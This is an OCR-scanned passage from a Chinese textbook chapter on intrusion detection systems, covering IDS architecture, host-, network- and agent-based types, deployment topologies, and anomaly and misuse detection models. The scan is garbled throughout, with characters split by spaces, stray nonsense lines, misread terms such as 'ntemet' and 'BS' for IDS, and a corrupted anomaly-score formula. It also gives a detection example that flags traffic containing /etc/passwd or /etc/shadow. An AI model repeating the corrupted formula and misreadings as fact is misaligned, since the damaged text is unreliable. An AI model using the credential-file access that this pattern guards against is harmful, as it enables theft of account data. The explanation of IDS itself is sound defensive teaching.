2) “数据 提取 

从 收集 到 的 数据 中 提取 有 用 的 数据 ， 以 供 数据 分 析 之 用 。 

3) ”数据 分 析 

对 收集 到 的 有 关系 统 、 网 络 运行 、 数 据 及 用 户 活动 的 状态 和 行为 等 数据 通过 三 种 技术 
手段 进行 分 析 : 模块 匹配 、 统 计 分 析 和 完整 性 分 析 。 

4) ”结果 处 理 

记录 入 侵 事件 ， 同 时 采取 报警 、 中 断 连 接 等 措施 。 


5.2.2 ”入 侵 检测 系统 的 构成 与 功能 


入 侵 检测 系统 通过 对 计算 机 网 络 或 计算 机 系统 中 的 若干 关键 点 收集 信息 并 进行 分 析 ， 
从 中 发 现 网 络 或 系统 中 是 否 有 违反 安全 策略 的 行为 和 被 攻击 的 迹象 。 入 侵 检 测 系统 执行 的 
主要 任务 包括 : 监视 、 分 析 用 户 及 系统 活动 ， 审 计 系 统 构 造 和 弱点 ， 识 别 、 反 映 已 知 进攻 
的 活动 模式 ， 向 相关 人 士 报 警 ， 统 计 分 析 异 常 行为 模式 ， 评估 重 要 系统 和 数据 文件 的 完整 
性 ;， 审计、 跟踪 管理 操作 系统 ， 识 别 用 户 违反 安全 策略 的 行为 。 

1. 入 侵 检 测 系统 的 构成 


入 侵 检测 系统 主要 包括 三 部 分 : 探测 器 、 数 据 采 集 器 和 控制 台 。 探 测 器 是 一 个 黑匣子 ， 
运行 时 没有 用 户 界面 ;数据 采集 器 是 同 管理 控制 台 在 同一 台 机 器 上 的 服务 ， 它 负责 接受 控 
测 器 发 送 的 数据 包 ， 解 析 转 发 给 管理 控制 台 ， 管 理 控制 台面 向 用 户 ， 是 一 个 图 形 界面 控制 
终端 。 探 测 器 与 数据 采集 器 和 控制 终端 的 通讯 建立 在 认证 和 加 密 的 基础 上 。 

网 络 探测 器 负责 监视 网 络 上 所 有 类 型 的 数据 包 ， 实 时 检测 恶意 的 攻击 行为 特征 ， 同 时 
将 有 关 告 警 信 息 发 送 给 数据 采集 器 ， 由 数据 采集 器 发 送 给 控制 台 或 发 送 E-mail 给 管理 员 ， 
控制 台 接受 到 告警 信息 ， 显 示 告 警 信息 (文字 )、 发 告警 声音 和 nt 日 志 等 ， 以 提醒 有 关 管 理 
人 员 查 看 和 根据 情况 采取 相应 的 措施 。 告 警 信息 包括 : 连接 双方 的 源 瑟 地 址 、 目 的 下 地 
址 、 源 、 目 的 端口 以 及 简单 的 告警 信息 说 明 等 。 

数据 采集 器 在 转发 告警 信息 之 前 ， 首 先 把 告警 信息 保存 到 数据 库 中 ， 控 制 台 再 提供 在 
前 告警 信息 或 历史 日 志 记录 中 简单 的 查询 和 删除 等 功能 。 
2. 入 侵 检测 系统 (IDS) 的 主要 功能 


(1) 识别 黑客 常用 入 侵 与 攻击 手段 。 入 侵 检测 技术 通过 分 析 各 种 攻击 的 特征 ， 可 以 全 
面 快速 地 识别 探测 攻击 、 拒 绝 服 务 攻击 、 缓 冲 区 溢出 攻击 等 各 种 常用 攻击 手段 ， 并 做 相应 
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的 措施 。 

(2) 监控 网 络 异常 通信 。IDS 系统 会 对 网 络 中 不 正常 的 通信 连接 做 出 反应 ， 保 证 网 络 
通信 的 合法 性 : 任何 不 符合 网 络 安全 策略 的 网 络 数据 都 会 被 BS 侦 测 到 并 警告 。 

(3) 鉴别 对 系统 漏洞 及 后 门 的 利用 。IDS 系统 一 般 带 有 系统 漏洞 及 后 门 的 详细 信息 ， 
通过 对 网 络 数据 包 连 接 的 方式 、 连 接 端口 以 及 连接 中 特定 的 内 容 等 特征 分 析 ， 可 以 有 效 地 
发 现 网 络 通信 中 针对 系统 漏洞 进行 的 非法 行为 。 

(4) 完善 网 络 安全 管理 。IDS 通过 对 攻击 或 入 侵 的 检测 及 反应 ， 可 以 有 效 地 发 现 和 防 
止 大 部 分 的 网 络 犯罪 行为 ， 给 网 络 安全 管理 提供 了 一 个 集中 、 方便 、 有 效 的 工具 。 使 用 IDS 
系统 的 监测 、 统 计 分 析 、 报 表 功 能 ， 可 以 进一步 完善 网 络 管理 。 

对 一 个 成 功 的 入 侵 检测 系统 来 讲 ， 它 不 但 可 以 使 系统 管理 员 时 刻 了 解 网 络 系统 (包括 
程序 、 文 件 和 硬件 设备 等 ) 的 任何 变更 ， 还 能 给 网 络 安全 策略 的 制定 提供 指南 。 更 为 重要 的 
一 点 是 ， 它 应 该 管理 、 配 置 简单 ， 从 而 使 非 专业 人 员 非 常 容易 地 获得 网 络 安全 。 入 侵 检测 
的 规模 还 应 根据 网 络 威胁 、 系 统 构造 和 安全 需求 的 改变 而 改变 。 入 侵 检测 系统 在 发 现 攻击 
后 ， 会 及 时 做 出 响应 ， 包 括 切断 网 络 连接 、 记 录 事 件 和 报警 等 。 


5.2.3 ”入 侵 检测 系统 的 分 类 


入 侵 检测 系统 根据 采用 的 技术 可 分 为 异常 和 特征 的 检测 ， 根 据 检测 对 象 可 以 分 为 基于 
主机 的 、 基 于 网 络 的 和 基于 代理 型 的 入 侵 检测 系统 。 

1. 根据 其 采用 的 技术 可 以 分 为 异常 检测 和 特征 检测 

(1) 异常 检测 ， 异常 检测 的 假设 是 入 侵 者 活动 异常 于 正常 主体 的 活动 ， 建 立正 常 活动 
的 “活动 简 档 ”， 当 前 主体 的 活动 违反 其 统计 规律 时 ， 认 为 可 能 是 “入 侵 ” 行 为 。 通 过 检 
测 系统 的 行为 或 使 用 情况 的 变化 来 完成 。 

(2) 特征 检测 : 特征 检测 假设 入 侵 者 活动 可 以 用 一 种 模式 来 表示 ， 然 后 将 观察 对 象 与 
之 进行 比较 ， 判 别 是 否 符合 这 些 模式 。 

(3) 协议 分 析 : 利用 网 络 协议 的 高 度 规则 性 快速 探测 攻击 的 存在 。 

2. 根据 其 监测 的 对 象 

根据 其 监测 的 对 象 是 主机 还 是 网 络 可 以 分 为 3 类 ， 基 于 主机 型 (host based) 入 侵 检测 系 
统 、 基 于 网 络 型 network based) 入 侵 检 测 系统 和 基于 代理 型 (agent based) 入 侵 检 测 系统 。 

1) “基于 主机 的 入 侵 检测 系统 

基于 主机 的 入 侵 检 测 系统 通常 以 系统 日 志 、 应 用 程序 日 志 等 审计 记录 文件 作为 数据 源 。 
它 是 通过 比较 这 些 审计 记录 文件 的 记录 与 攻击 签名 (attack signature 指 用 的 方式 来 表示 已 知 
的 攻击 模式 ) 以 发 现 它 们 是 否 匹配 。 如 果 匹 配 ， 检测 系 统 向 系统 管理 员 发 出 入 侵 报 警 并 采取 
相应 的 行动 。 基 于 主机 的 IDS 可 以 精确 地 判断 入 侵 事件 ， 并 可 对 入 侵 事件 及 时 做 出 反应 。 
它 还 可 针对 不 同 操作 系统 的 特点 判断 应 用 层 的 入 侵 事 件 。 基 于 主机 的 IDS 有 着 明显 的 
优点 。 

基于 主机 的 入 侵 检测 系统 对 系统 内 在 的 结构 却 没有 任何 约束 ， 同 时 可 以 利用 操作 系统 
本 身 提供 的 功能 ， 并 结合 异常 检测 分 析 ， 更 能 准确 的 报告 攻击 行为 。 
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基于 主机 的 入 侵 检 测 系统 存在 的 不 足 之 处 在 于 , 会 占用 主机 系统 资源 , 增加 系统 负荷 ， 
而 且 针 对 不 同 的 操作 平台 必须 开发 出 不 同 的 程序 ， 另 外 所 需 配 置 的 数量 众多 。 

2) “基于 网 络 的 入 侵 检 测 系 统 

基于 网 络 的 入 侵 检 测 系统 把 原始 的 网 络 数据 包 作为 数据 源 ， 利 用 网 络 适 配器 来 实时 地 
监视 并 分 析 通 过 网 络 进行 传输 的 所 有 通信 业务 。 它 用 攻击 识别 模块 进行 攻击 签名 识别 ， 其 
方法 有 模式 、 表 达 式 或 字 节 码 匹 配 、 频 率 或 闪 值 比较 、 次 要 事件 的 相关 性 处 理 、 统 计 异 常 
检测 等 。 一 旦 检测 到 攻击 ，IDS 的 响应 模块 通过 通知 、 报 警 以 及 中 断 连 接 等 方式 来 对 攻击 
行为 做 出 反应 。 然 而 它 只 能 监视 通过 本 网 段 的 活动 ， 并 且 精 确 度 较 差 ， 在 交换 网 络 环境 中 
难于 配置 ， 防 欺骗 的 能 力也 比较 差 。 其 优势 如 下 

(1) 成 本 低 。 

(2) 攻击 者 转移 证 据 困 难 。 

(3) 实时 检测 和 响应 。 

(4) 能 够 检测 到 未 成 功 的 攻击 企图 。 

(5) 与 操作 系统 无 关 ， 即 基于 网 络 的 IDS 并 不 依赖 主机 的 操作 系统 作为 检测 资源 。 

3) ”基于 代理 的 入 侵 检测 系统 

基于 代理 的 入 侵 检测 系统 用 于 监视 大 型 网 络 系统 。 随 着 网 络 系统 的 复杂 化 和 大 型 化 ， 
系统 弱点 趋 于 分 布 式 ， 而 且 攻 击 行为 也 表现 为 相互 协作 式 特点 ， 所 以 不 同 的 IDS 之 间 需 要 
共享 信息 ， 协 同 检 测 。 整 个 系统 可 以 由 一 个 中 央 监 视 器 和 多 个 代理 组 成 。 中 央 监 视 器 负责 
对 整个 监视 系统 的 管理 ， 它 应 该 处 于 一 个 相对 安全 的 地 方 。 代 理 则 被 安放 在 被 监视 的 主机 
上 (如 服务 器 、 交 换 机 和 路 由 器 等 )。 代 理 负责 对 某 一 主机 的 活动 进行 监视 ， 如 收集 主机 运 
行 时 的 审计 数据 和 操作 系统 的 数据 信息 ， 然 后 将 这 些 数 据 传送 到 中 央 监 视 器 。 代 理 也 可 以 
接受 中 央 监 控 器 的 指令 ， 这 种 系统 的 优点 是 可 以 对 大 型 分 布 式 网 络 进行 检测 。 

3. 根据 工作 方式 分 为 离线 检测 系统 与 在 线 检测 系统 


(1) 离线 检测 系统 : 离线 检测 系统 是 非 实时 工作 的 系统 ， 它 在 事后 分 析 审 计 事 件 ， 从 
中 检查 入 侵 活 动 。 事 后 入 侵 检 测 由 网 络 管理 人 员 进 行 ， 他 们 具有 网 络 安全 的 专业 知识 ， 
据 计 算 机 系统 对 用 户 操作 所 做 的 历史 审计 记录 判断 是 否 存在 入 侵 行为 , 如 果 有 就 断 开 连 接 ， 
并 记录 入 侵 证 据 和 进行 数据 恢复 。 事 后 入 侵 检测 是 管理 员 定期 或 不 定期 进行 的 ， 不 具有 实 
时 性 。 

(2) 在 线 检测 系统 : 在 线 检测 系统 是 实时 联机 的 检测 系统 ， 它 包含 对 实时 网 络 数据 包 
分 析 ， 实 时 主机 审计 分 析 。 其 工作 过 程 是 实时 入 侵 检测 在 网 络 连接 过 程 中 进行 ， 系 统 根据 
用 户 的 历史 行为 模型 、 存 储 在 计算 机 中 的 专家 知识 以 及 神经 网 络 模型 对 用 户 当前 的 操作 进 
行 判断 ， 一 旦 发 现 入 侵 迹 象 立即 断 开 入 侵 者 与 主机 的 连接 ， 并 搜集 证 据 和 实施 数据 恢复 。 
这 个 检测 过 程 是 不 断 循环 进行 的 。 


5.2.4 ”入 侵 检 测 系统 的 部 署 


在 已 拥有 防火 墙 基础 之 上 部 署 入 侵 检测 系统 ， 应 首先 考虑 目前 的 网 络 规模 和 范围 以 及 
需要 保护 的 数据 和 基础 设施 等 ， 由 于 IDS 只 是 一 种 安全 硬件 ， 而 且 由 于 IDS 在 行为 检测 过 
程 中 可 能 会 占用 比较 多 的 资源 ， 这 对 于 一 个 极 小 的 网 络 来 说 会 成 为 很 大 的 负担 ， 甚 至 会 影 


响 网 络 的 使 用 性 能 。 用 户 只 有 根据 自身 的 需求 进行 评估 后 ， 才 可 以 对 相关 的 IDS 或 IPS 进 
行 评测 考证 ， 随 后 才能 讨论 IDS 如 何 融入 现 有 的 安全 策略 中 。 
1. 定义 IDS 的 目标 


不 同 的 组 网 应 用 可 能 使 用 不 同 的 规则 配置 ， 所 以 用 户 在 配置 入 侵 检测 系统 前 应 先 明 确 
自己 的 目标 ， 建 议 从 如 下 几 个 方面 进行 考虑 。 
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明确 网 络 拓扑 需求 
分 析 网 络 拓扑 结构 ， 需 要 监控 什么 样 的 网 络 ， 是 用 什么 物理 链接 的 ,是 交换 机 还 是 


是 否 需要 同时 监控 多 个 网 络 ， 多 个 子 网 是 交换 机 连接 还 是 通过 路 由 器 /网 关连 接 。 
选择 网 络 入 口 点 ， 需 要 把 网 络 监视 主机 放 到 什么 位 置 。 

分 析 关 键 网 络 组 件 、 网 络 大 小 和 复杂 度 。 

安全 策略 需求 

是 否 限 制 Telnet、SSH、HTTP、HTTPS 等 服务 管理 访问 。 

Telnet 登录 是 否 需 要 登录 密码 。 

安全 的 Shell(SSH) 的 认证 机 制 是 否 需要 加 强 。 

是 否 允 许 从 非 管理 口 (如 以 太 网 口 ， 而 不 是 Console 端口 ) 进 行 设备 管理 。 

IDS 的 管理 需求 
有 哪些 接口 需要 配置 管理 服务 。 

是 否 启用 Telnet 进行 设备 管理 。 

是 否 启用 SSH 进行 设备 管 

是 否 启用 HTTP 进行 设备 管理 。 

是 否 启 用 HTTPS 进行 设备 管理 。 

是 否 需 要 和 其 他 设备 (例如 防火 墙 ) 进 行 联动 。 


2. 选择 监视 内 容 


1) 


选择 监视 的 网 络 区 域 


在 小 型 网 络 结构 中 ， 如 果 内 部 网 络 是 可 以 信任 的 ， 那 么 只 需要 监控 内 部 网 络 和 外 部 网 
络 的 边界 流量 。 


2) 


选择 监视 的 数据 包 的 类 型 


入 侵 检 测 系 统 可 事先 对 攻击 报 文 进行 协议 分 析 ， 从 中 提取 也 、TCP、UDP、ICMP 协 
议 头 信息 和 应 用 载荷 数据 的 特征 ， 并 且 构 建 特征 匹配 规则 ， 然 后 根据 需求 使 用 特征 匹配 规 


3) 


则 对 侦 听 到 的 网 络 流量 (包括 他 包 、TCP 包 、UDP 包 和 ICMP 包 ) 进 行 精确 检测 ， 若 规则 命 
中 ， 表 明 该 网 络 流量 中 包含 入 侵 。 


根据 网 络 数据 包 的 内 容 进行 检测 


利用 字符 串 模式 匹配 技术 对 网 络 数据 包 的 内 容 进行 匹配 ， 来 检测 多 种 方式 的 攻击 和 探 
测 ， 如 缓冲 区 溢出 、CGI 攻击、SMB 检测 、 操 作 系统 类 型 探测 等 。 例 如 ， 当 有 用 户 企图 下 
载 Unix/Linux 系统 中 的 /etc/passwd 或 /etc/shadow 文件 时 , IDS 也 会 给 出 警报 , 这 是 因为 IDS 
捕捉 到 的 数据 包 的 内 容 中 含有 特征 字符 串 /etc/passwd 或 /etc/shadow。 


一 般 来 说 ， 不 同 的 入 侵 检测 系统 采用 不 同 的 方法 来 监视 网 络 数据 包 的 内 容 ， 例 如 可 以 


ta 


采用 先 根据 网 络 协议 来 选择 入 侵 特征 规则 进行 检测 ， 然 后 再 根据 此 协议 数据 包 中 的 字符 特 
征 进行 检测 。 


3. 部 署 IDS 


1) “只 检测 内 部 网 络 和 外 部 网 络 边界 流量 的 IDS 系统 的 部 署 
在 小 型 网 络 结构 中 ， 如 果 内 部 网 络 是 可 以 信任 的 ， 那 么 只 需要 监控 内 部 网 络 和 外 部 网 


络 的 边界 流量 。 这 种 情况 下 ， 入 侵 检测 系统 部 署 在 出 口 路 由 器 或 防火 墙 的 后 面 ， 用 来 监控 
网 络 入 口 处 所 有 流入 和 流出 网 络 的 流量 , 网 络 拓扑 结构 可 按照 如 图 5-19 所 示 的 方式 进行 部 署 。 


在 图 5-19 中 ，IDS 被 部 署 在 内 部 网 络 与 ntemet 的 出 口 处 ，IDS 设备 的 监听 口 连 接 到 


了 内 部 网 络 出 口 处 的 交换 机 (Switch) 镜 像 接 口上 ， 从 而 可 以 捕获 到 交换 机 镜像 接口 的 网 络 
流量 。 


管理 员 可 以 通过 命令 行 方式 (Console、Telnet 或 SSH) 或 Web 方式 (HTTP 或 HTTPS) 远 


程 登录 到 IDS 管理 接口 并 对 设备 进行 配置 管理 。 


如 图 5-19 所 示 的 部 署 方式 不 仅 方便 了 用 户 的 使 用 和 配置 ， 也 节约 了 投资 成 本 ,适合 中 


小 规模 企业 的 网 络 安全 应 用 。 


潼 洲 落 粮 壮 ” 填 潍 共 侣 上 人 负 到 汝 卫 


服务 器 


计算 机 1 | 
计算 机 2 | 


和 二 


5-19 ”监控 网 络 边界 流量 的 IDS 系统 的 拓扑 结构 
2) “集中 监控 多 个 子 网 流量 
在 这 种 组 网 情况 下 ， 内 部 局 域 网 中 划分 了 多 个 不 同 职能 的 子 网 ， 有 些 子 网 访问 某 些 子 
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网 资源 量 希 望 受 到 监控 和 保护 ， 假 设 具体 进行 监控 。 


(1) 需要 对 关键 子 网 LAN1 的 流量 进行 监控 。 

(2) LAN2 子 网 放置 了 各 种 服务 器 ， 因 此 对 LAN2 的 所 有 流量 也 需要 进行 监控 。 

(3) 网 络 管理 员 要 能 够 集中 监控 网 络 的 流量 和 异常 情况 。 

在 这 种 情况 下 ， 含 IDS 的 网 络 拓扑 如 图 5-20 示 。 

管理 员 可 以 通过 安全 管理 平台 全 网 的 IDS 设备 进行 统一 的 配置 管理 、 策 略 部 署 和 安全 


事件 监控 ， 还 可 以 利用 安全 管理 平台 提供 的 多 种 智能 分 析 和 管理 手段 对 收集 到 的 网 络 安全 


事 人 


F 信 息 进行 处 理 ， 并 依据 处 理 结果 调整 安全 策略 和 防护 手段 ， 从 而 提高 网 络 安全 的 整体 


水 平 。 


局 域 网 1 局 域 网 2 站 


IDS 管 理 主机 


全 
5-20 集中 监控 多 个 子 网 流量 的 IDS 拓扑 结构 
5.2.5 ”入 侵 检 测 系统 的 选 型 


入 侵 检 测 系 统 的 模型 多 种 多 样 ， 根 据 不 同 的 检测 模型 的 设置 所 要 考虑 的 要 点 也 有 所 侧 
E， 总 的 来 说 分 为 几 种 方式 。 

1. 异常 检测 模型 的 基本 原理 

异常 检测 ， 也 被 称 为 基于 行为 的 检测 。 其 基本 前 提 是 假定 所 有 的 入 侵 行为 都 是 异常 的 。 
其 基本 原理 是 ， 首 先 建立 系统 或 用 户 的 “正常 ”行为 特征 轮廓 ， 通 过 比较 当前 的 系统 或 用 
户 的 行为 是 否 偏离 正常 的 行为 特征 轮廓 来 判断 是 否 发 生 了 入 侵 ， 而 不 是 依赖 于 具体 行为 是 
否 出 现 来 进行 检测 的 。 从 这 个 意义 上 来 讲 ， 异 常 检 测 是 一 种 间接 的 方法 。 

2. 异常 检测 的 关键 技术 

1) ”特征 量 的 选择 

异常 检测 首先 是 要 建立 系统 或 用 户 的 “正常 ”行为 特征 轮廓 ， 这 就 要 求 在 建立 正常 模 
型 时 ， 选 取 的 特征 量 既 要 能 准确 地 体现 系统 或 用 户 的 行为 特征 ， 又 能 使 模型 最 优化 ， 即 以 
最 少 的 特征 量 就 能 涵盖 系统 或 用 户 的 行为 特征 。 例 如 : 可 以 检测 磁盘 的 转速 是 否 正常 ; CPU 
是 否 无 故 超频 等 异常 现象 。 

2) “参考 阀 值 的 选 定 

因为 在 实际 的 网 络 环境 下 ， 入 侵 行为 和 异常 行为 往往 不 是 一 对 一 的 等 价 关 系 ， 经 常 发 
生 这 样 的 异常 情况 ， 如 某 一 行为 是 异常 行为 ， 而 它 并 不 是 入 侵 行 为 ;同样 存在 某 一 行为 是 
入 侵 行为 ， 而 它 却 并 不 是 异常 行为 的 情况 。 这 样 就 会 导致 检测 结果 的 虚 警 (false positives) 
和 漏 警 (false negatives) 的 产生 。 由 于 异常 检测 是 先 建立 正常 的 特征 轮廓 作为 比较 的 参考 基 
准 ， 这 个 参考 基准 即 参 考 阔 值 的 选 定 是 非常 关键 的 ， 阁 值 定 得 过 大 ， 那 漏 警 率 会 很 高 ; 阅 
值 定 得 过 小 ， 则 虚 警 率 就 会 提高 。 合 适 的 参考 阔 值 的 选 定 是 影响 这 一 检测 方法 准确 率 的 至 
关 重 要 的 因素 。 

从 异常 检测 的 原理 可 以 看 出 ， 该 方法 的 技术 难点 在 于 “正常 ”行为 特征 轮廓 的 确定 、 


| 由 
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特征 量 的 选取 、 特 征 轮廓 的 更 新 。 由 于 这 几 个 因素 的 制约 ， 异 常 检测 的 虚 警 率 很 高 ， 但 对 
于 未 知 的 入 侵 行为 的 检测 非常 有 效 。 此 外 ， 由 于 需要 实时 地 建立 和 更 新 系统 或 用 户 的 特征 
轮廓 ， 这 样 所 需 的 计算 量 很 大 ， 对 系统 的 处 理性 能 要 求 会 很 高 。 

3. 异常 检测 模型 的 实现 方法 

异常 检测 模型 常用 的 实现 方法 有 基于 统计 分 析 的 异常 检测 方法 、 基 于 特征 选择 的 异常 
检测 方法 、 基 于 贝 叶 斯 推理 的 异常 检测 方法 、 基 于 贝 叶 斯 网 络 的 异常 检测 方法 、 基 于 模式 
预测 的 异常 检测 方法 、 基 于 神经 网 络 的 异常 检测 方法 、 基 于 见 叶 斯 聚 类 的 异常 检测 方法 、 
基于 机 器 自学 习 系 统 的 异常 检测 方法 和 基于 数据 采掘 技术 的 异常 检测 方法 等 。 

1) “基于 统计 分 析 的 异常 检测 方法 

基于 统计 分 析 的 异常 检测 方法 是 根据 异常 检测 器 观察 主体 的 活动 情况 ， 随 之 产生 能 刻 
画 这 些 活动 的 行为 框架 。 每 一 个 框架 能 保存 记录 主体 的 当前 行为 ， 并 定时 地 将 当前 的 框架 
与 存储 的 框架 合并 。 通 过 比较 当前 的 框架 与 事先 存储 的 框架 来 判断 异常 行为 ， 从 而 检测 出 
网 络 的 入 侵 行 为 。 设 MI 、M2、…、Mn 为 框架 的 特征 变量 ， 如 CPU 的 使 用 、LO 的 使 用 、 
使 用 地 点 及 时 间 、 邮 件 的 使 用 、 文 件 的 访问 数量 、 网 络 的 会 话 时 间 等 。 用 S1、S2、…、Sn 
分 别 表示 与 框架 中 的 变量 MI1、M2、…、Mn 对 应 的 异常 测量 值 ， 这 些 值 表 明了 异常 程度 ， 
S 的 值 越 高 ， 则 Mi 的 异常 性 就 越 大 。 

框架 的 异常 值 是 将 有 关 的 异常 测量 平方 加 权 后 得 到 的 ， 其 计算 式 如 下 。 

S=aS? +aqS? +-…+a,S? 

其 中 ，ai 表示 框架 与 变量 Mi 相关 的 权重 ,一 般 的 Ml1、M2、…、Man 不 是 相互 独立 的 ， 而 
是 具有 相关 性 的 。 常 见 的 几 种 异常 测量 值 的 测量 类 型 如 下 

(1) 活动 强度 测量 。 用 以 描述 活动 的 处 理 速 度 。 

(2) 审计 记录 分 布 测量 。 用 以 描述 最 近 审 计 记 录 中 所 有 活动 类 型 的 分 布 状况 。 

(3) 类 型 测量 。 用 以 描述 特定 的 活动 在 各 种 类 型 的 分 布 状况 。 

(4) 顺序 测量 。 用 以 描述 活动 的 输出 结果 。 

2) “基于 特征 选择 的 异常 检测 方法 

基于 特征 选择 的 异常 检测 方法 是 通过 从 一 组 度量 中 挑选 能 检测 出 入 侵 的 度量 构成 子 集 
来 准确 地 预测 或 分 类 已 检测 到 的 入 侵 。 

3) “基于 贝 叶 斯 推理 的 异常 检测 方法 

基于 贝 叶 斯 (Bayesian) 推理 异常 检测 方法 是 通过 在 任意 的 时 刻 ， 测 量 AL、A2、… 
An 变量 值 推理 判断 系统 是 否 有 入 侵 事件 的 发 生 。 其 中 每 个 Al 变量 表示 系统 不 同 的 方面 特 
征 (如 磁盘 IO 的 活动 数量 ， 或 者 系统 中 页 面 出 错 的 次 数 ) 。 

4) “基于 贝 叶 斯 网 络 的 异常 检测 方法 

基于 贝 叶 斯 网 络 的 异常 检测 方法 是 通过 建立 起 异常 入 侵 检 测 的 贝 叶 斯 网 络 ， 然 后 将 其 
用 作 分 析 异 常 测量 的 结果 。 

5) ”基于 模式 预测 的 异常 检测 方法 

基于 模式 预测 异常 检测 方法 是 假设 事件 序列 不 是 随机 的 ， 而 是 能 遵循 可 辨别 的 模式 ， 
这 种 检测 方法 的 主要 特点 是 考虑 事件 的 序列 及 其 相互 联系 。 其 典型 模型 是 由 Teng 和 Cherl 
提出 的 基于 时 间 的 推理 方法 ， 利 用 时 间 规 则 识别 用 户 行为 正常 模式 的 特征 。 通 过 归纳 学 习 
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产生 这 些 规则 集 ， 并 能 动态 地 修改 系统 中 的 这 些 规 则 ， 使 之 具有 高 的 预测 性 、 准 确 性 和 可 
信 度 。 

6) ”基于 神经 网 络 的 异常 检测 方法 

基于 神经 网 络 的 入 侵 检测 方法 是 训练 神经 网 络 连 续 的 信息 单元 ， 这 里 的 信息 单元 指 的 
是 一 条 命令 。 网 络 的 输入 层 是 用 户 当前 输入 的 命令 和 已 执行 过 的 N 条 命令 ， 神 经 网 络 就 是 
利用 用 户 使 用 过 的 N 条 命令 来 预测 用 户 可 能 使 用 的 下 一 条 命令 。 当 神经 网 络 预测 不 出 某 用 
户 正确 的 后 续 命 令 ， 即 在 某 种 程度 上 表明 了 有 异常 事件 发 生 ， 以 此 进行 异常 入 侵 的 检测 。 

7) “基于 贝 叶 斯 聚 类 的 异常 检测 方法 

基于 贝 叶 斯 聚 类 的 异常 检测 方法 是 通过 在 数据 中 发 现 不 同类 别 的 数据 集合 ， 这 些 类 反 
映 出 了 基本 的 因果 关系 ， 以 此 就 可 以 区 分 异常 用 户 类 ， 进 而 推断 入 侵 事 件 发 生来 检测 异常 
入 侵 的 行为 。 

8) ”基于 机 器 自学 习 系统 的 异常 检测 方法 

基于 机 器 自学 习 系统 的 异常 检测 方法 是 将 异常 检测 问题 归结 为 根据 离散 数学 临时 序列 
学 习 获 得 个 体 、 系 统 和 网 络 的 行为 特征 ， 提 出 一 个 基于 相似 度 的 学 习 方法 IBL， 该 方法 通 
过 新 的 序列 相似 度 的 计算 ， 将 原始 数据 转化 成 可 度量 的 空间 。 然 后 ， 应 用 IBL 的 学 习 技术 
和 一 种 新 的 基于 序列 的 分 类 方法 ， 从 而 发 现 异 常 类 型 事件 ， 以 此 进行 入 侵 行为 的 检测 。 

9) “基于 数据 采掘 技术 的 异常 检测 方法 

基于 数据 采掘 技术 的 异常 检测 方法 是 将 数据 采掘 技术 应 用 到 入 侵 检测 研究 领域 中 ， 从 
审计 数据 或 数据 流 提取 感 兴 趣 的 知识 、 规 则 、 规 律 和 模式 等 形式 ， 并 用 这 些 知识 去 检测 异 
常 入 侵 和 已 知 的 入 侵 。 基 于 数据 采掘 技术 的 异常 入 侵 检测 通常 使 用 的 是 KDD(knowledge 
Discovery in Databases， 数 据 库 中 的 知识 提取 ) 算 法 ， 该 算法 就 是 从 数据 库 中 自动 提取 有 用 
的 信息 (知识 ) 。 这 种 算法 的 优点 是 选用 于 处 理 大 量 的 数据 ， 但 KDD 算法 只 能 对 事后 数据 
进行 分 析 ， 而 不 能 进行 实时 跟踪 处 理 。 

4. 误 用 检测 模型 的 基本 原理 

在 介绍 基于 误 用 的 入 侵 检 测 的 概念 之 前 ， 有 必要 对 误 用 的 概念 做 一 个 简单 的 介绍 。 误 
用 是 英文 Misuse 的 中 文 直 译 ， 其 意思 是 : “可 以 用 某 种 规则 、 方 式 或 模型 表示 的 攻击 或 其 
他 安全 相关 行为 ”。 

根据 对 误 用 概念 的 这 种 理解 ， 可 以 定义 基于 误 用 的 入 侵 检 测 技术 的 含义 ，“ 误 用 检测 ” 
技术 主要 是 通过 某 种 方式 预先 定义 入 侵 行为 ， 然 后 监视 系统 的 运行 ， 并 从 中 找 出 符合 预先 
定义 规则 的 入 侵 行为 。 

基于 误 用 的 入 侵 检测 系统 ， 通 过 使 用 某 种 模式 或 者 信号 标识 表示 攻击 ， 进 而 发 现 相 同 
的 攻击 。 这 种 方式 可 以 检测 许多 甚至 全 部 已 知 的 攻击 行为 ， 但 是 对 于 未 知 的 攻击 手段 却 无 
能 为 力 ， 这 一 点 和 病毒 检测 系统 类 似 。 

对 于 误 用 检测 系统 来 说 ， 最 重要 的 技术 如 下 。 

(1) 如 何 全 面 描述 攻击 的 特征 ， 覆 盖 在 此 基础 上 的 变种 方 。 

(2) 如 何 排 除 其 他 带 有 干扰 性 质 的 行为 ， 减 少 误 报 率 。 

误 用 检测 ， 也 被 称 为 基于 知识 的 检测 。 其 基本 前 提 是 假定 所 有 可 能 的 入 侵 行为 都 能 被 
识别 和 表示 。 其 原理 是 ， 首 先 对 已 知 的 攻击 方法 进行 攻击 签名 (攻击 签名 是 指 用 一 种 特定 的 


© 


(@ 付 > 计算 机 网 络 安全 


当 洲 茹 粮 半 ”车 潍 R 侣 睹 出 到 招 于 


方式 来 表示 已 知 的 攻击 模式 ) 表 示 ， 然 后 根据 已 经 定义 好 的 攻击 签名 ， 通 过 判断 这 些 攻 击 签 
名 是 否 出 现 来 判断 入 侵 行为 的 发 生 与 否 。 这 种 方法 是 直接 判断 攻击 签名 的 出 现 与 否 来 判断 
入 侵 的 ， 从 这 一 点 来 看 ， 它 是 一 种 直接 的 方法 。 

误 用 检测 技术 的 关键 问题 是 攻击 签名 的 正确 表示 。 误 用 检测 是 根据 攻击 签名 来 判断 入 
侵 的 ， 如 何 用 特定 的 模式 语言 来 表示 这 种 攻击 行为 ， 是 该 方法 的 关键 所 在 。 尤 其 是 攻击 签 
名 必须 能 够 准确 地 表示 入 侵 行为 及 其 所 有 可 能 的 变种 , 同时 又 不 会 把 非 入 侵 行为 包含 进来 。 
由 于 大 部 分 的 入 侵 行为 是 利用 系统 的 漏洞 和 应 用 程序 的 缺陷 进行 攻击 的 ， 那 么 通过 分 析 攻 
击 过 程 的 特征 、 条 件 、 排 列 以 及 事件 间 的 关系 ， 就 可 具体 描述 入 侵 行 为 的 迹象 。 这 些 迹象 
不 仅 对 分 析 已 经 发 生 的 入 侵 行为 有 帮助 ， 而 且 对 即将 发 生 的 入 侵 也 有 预警 作用 ， 因 为 只 要 
部 分 满足 这 些 入 侵 迹 象 就 意味 着 有 入 侵 行 为 发 生 的 可 能 。 

误 用 检测 是 通过 将 收集 到 的 信息 与 已 知 的 攻击 签名 模式 库 进行 比较 ， 从 而 发 现 违背 安 
全 策略 的 行为 。 该 方法 类 似 于 病毒 检测 系统 ， 其 检测 的 准确 率 和 效率 都 比较 高 。 而 且 这 种 
